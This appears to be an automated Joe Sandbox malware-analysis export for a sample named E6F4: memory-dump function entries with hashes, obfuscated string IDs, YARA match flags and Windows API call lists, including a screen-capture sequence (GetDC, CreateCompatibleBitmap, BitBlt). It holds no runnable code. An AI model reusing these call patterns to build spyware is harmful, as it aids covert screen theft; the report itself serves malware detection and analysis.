                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 5&'d$H/d$O$~
                                                                                                                                                                                                                                • API String ID: 0-3073078331
                                                                                                                                                                                                                                • Opcode ID: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
                                                                                                                                                                                                                                • Instruction ID: 7c8e188e2ff574dc84e1e58bec60109b2722ae2eee07efcef2931a8160e5a92b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b914b4801975b71dea4b75609ed348123c7e1e6468bc6ef1cacffb89bf502a6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC820F7550C3518BC324CF28C8917ABB7E1FF99314F198A6EE4C99B391E7389941CB4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 9?4<$BYQZ$DASS$F2}0$H/d$L$NR@:$R(RW$a
                                                                                                                                                                                                                                • API String ID: 0-1665691209
                                                                                                                                                                                                                                • Opcode ID: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                                • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83579c757a543f9f659438346f364b36b2e078702eec510370abc902ff0d75f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004258F4
                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042595D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                • String ID: B"@$)RSP$=^"\$`J/H$rp
                                                                                                                                                                                                                                • API String ID: 237503144-816972838
                                                                                                                                                                                                                                • Opcode ID: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                • Instruction ID: cd6e5e946c3164ee33c4da05371f075d598195140dbb1deecb8ac0c04a2143aa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf1cafb989073c4553b17663fd8b05ca961829d4f2cee33832e91d81a2f5237f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DA110B6E402188FDB10CFA8DC827EEBBB1FF85314F154169E414AB291D7B59942CB94
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                • API String ID: 0-102253164
                                                                                                                                                                                                                                • Opcode ID: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                • Instruction ID: 28c7f09c8b56808b4435d4f63c7b7d41f6ab7702d6ceba5225ea41b4d1eb27be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f96fe7a7a370e0a426616b44d01145cf498bc23b6eb0afd2ea812e4552abdc14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD3228B19003118BCF24CF28C892776BBB2FF95314F28929CD855AF795E775A802CB91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: *H%N$+P%V$,X0^$,\/b$2T'Z$4D"J$C`6f$C`6f
                                                                                                                                                                                                                                • API String ID: 0-102253164
                                                                                                                                                                                                                                • Opcode ID: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                • Instruction ID: 7c24634cc790d3dc5544db0222c0a2221dcce8583ae8b0beabc19f11c9a677e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d18ccd7fb329c2f7a5c3569352263da56546af64857bf12c5cea43640fe8961
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 923202B19402118BCB24CF24CC927A7B7B2FF95314F28829DD851AF395E779A842CBD5
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00588B0B
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00588B15
                                                                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00588BBC
                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00588BD1
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00588D1E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                • String ID: 6W01
                                                                                                                                                                                                                                • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                • Opcode ID: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                • Instruction ID: 7312075b84943fb40a2547e5a2566509b8c605fa5f2fb156755dd20867501884
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0515A72A443050BD728BF648C4A366BEC7ABC1310F1BC1399D85BF2E6ED749C068795
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: GetDC.USER32(00000000), ref: 005B6BF0
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: GetCurrentObject.GDI32(00000000,00000007), ref: 005B6C11
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: GetObjectW.GDI32(00000000,00000018,?), ref: 005B6C21
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: DeleteObject.GDI32(00000000), ref: 005B6C28
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: CreateCompatibleDC.GDI32(00000000), ref: 005B6C37
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005B6C42
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: SelectObject.GDI32(00000000,00000000), ref: 005B6C4E
                                                                                                                                                                                                                                  • Part of subcall function 005B6BE7: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 005B6C71
                                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 0058D7BC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                                • API String ID: 3248263802-1959178137
                                                                                                                                                                                                                                • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                • Instruction ID: 849a4f7fec2ecc81c1c34e63df7ae8d9fec4588c1ec9be38270b4ff9a88a76ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DB1F3756047818BE725CF2AC4D0762BFF2FB96300B1881ACC4D64BB46D738A846CB61
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00436980: GetDC.USER32(00000000), ref: 00436989
                                                                                                                                                                                                                                  • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                                                                                                                                                                                  • Part of subcall function 00436980: GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                                                                                                                                                                                  • Part of subcall function 00436980: GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                                                                                                                                                                                  • Part of subcall function 00436980: GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                                                                                                                                                                                  • Part of subcall function 00436980: DeleteObject.GDI32(00000000), ref: 004369C1
                                                                                                                                                                                                                                  • Part of subcall function 00436980: CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                                                                                                                                                                                  • Part of subcall function 00436980: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                                                                                                                                                                                  • Part of subcall function 00436980: SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                                                                                                                                                                                  • Part of subcall function 00436980: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0040D555
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                                                                • String ID: &W-Q$9Y$?C*]$|qay$~wxH
                                                                                                                                                                                                                                • API String ID: 3213364925-1959178137
                                                                                                                                                                                                                                • Opcode ID: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                • Instruction ID: aef483f231ee1e61a479db6060b0077f9689b526eef662d52e770a901b229f69
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae45af60d508102decc7da59701e9a4893ce939ff9a93b35a5cd895196908ad5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EEB115756047818BE325CF2AC4D0762BBE2FF96300B18C5ADC4D64BB86D738A806CB95
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )RSP$=^"\$B:$C@$K3$bX_^
                                                                                                                                                                                                                                • API String ID: 0-3030200349
                                                                                                                                                                                                                                • Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                • Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-1320392364
                                                                                                                                                                                                                                • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                • Instruction ID: f46172928ae7d3a95be6018bfd2b23f5e784760d9cf41c2fbc2124a2fc2055ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5791E5602083818BD718CF3988A237EFFD1AFD6314F28896DE4D68B291D279C50AC716
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-1320392364
                                                                                                                                                                                                                                • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                • API String ID: 0-3770969982
                                                                                                                                                                                                                                • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: D`a&$H/d$NMNO$bX_^
                                                                                                                                                                                                                                • API String ID: 2994545307-1599484891
                                                                                                                                                                                                                                • Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                                • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 'P0V$,D,J$9HiN$WT
                                                                                                                                                                                                                                • API String ID: 0-3770969982
                                                                                                                                                                                                                                • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                • Instruction ID: d40b10f774c2e135b87c3ee371f92d979634572f89c1c3cb09172a95d4d01f17
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4671BEB554D3958BD704DF12C8806AFBFE2FBD1314F188A2CE1D85B252C739894A8F86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: B:$C@$K3$bX_^
                                                                                                                                                                                                                                • API String ID: 0-595269213
                                                                                                                                                                                                                                • Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                • Instruction ID: 92b7b189efdc3b9ea8e16db67fda1118dd95d510ac953c2dc36047743a8c6833
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7041BFB5D102289BDB209F79CD467DDBFB5AB85300F4441EAE448A7255D6340E498FD2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d$NP,?$UA
                                                                                                                                                                                                                                • API String ID: 0-1353616787
                                                                                                                                                                                                                                • Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                                • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: H/d${wBy$?;;
                                                                                                                                                                                                                                • API String ID: 0-354475003
                                                                                                                                                                                                                                • Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                • Instruction ID: 4bfbb53be8bd6a0e8d90cbb5544f54c8feb7650d046148bfc4189ee72028eb3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E81D56020C3828BD719CF3988A137EBFD1AFD7314F28896DE4D68B281D279C50AC716
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                • Instruction ID: 60f707466bc11a5f46b82bba2d5314b2b579accae808459d7f66f3a646c9493a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8581D76020C3828BD719CF3985A136EFFD1AFD7314F28896DE4D68B281D279C90AC716
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650443592.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.1650443592.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_E6F4.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                • API String ID: 0-2390459867
                                                                                                                                                                                                                                • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_580000_E6F4.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: #=0$Z$ut
                                                                                                                                                                                                                                • API String ID: 0-1971374411
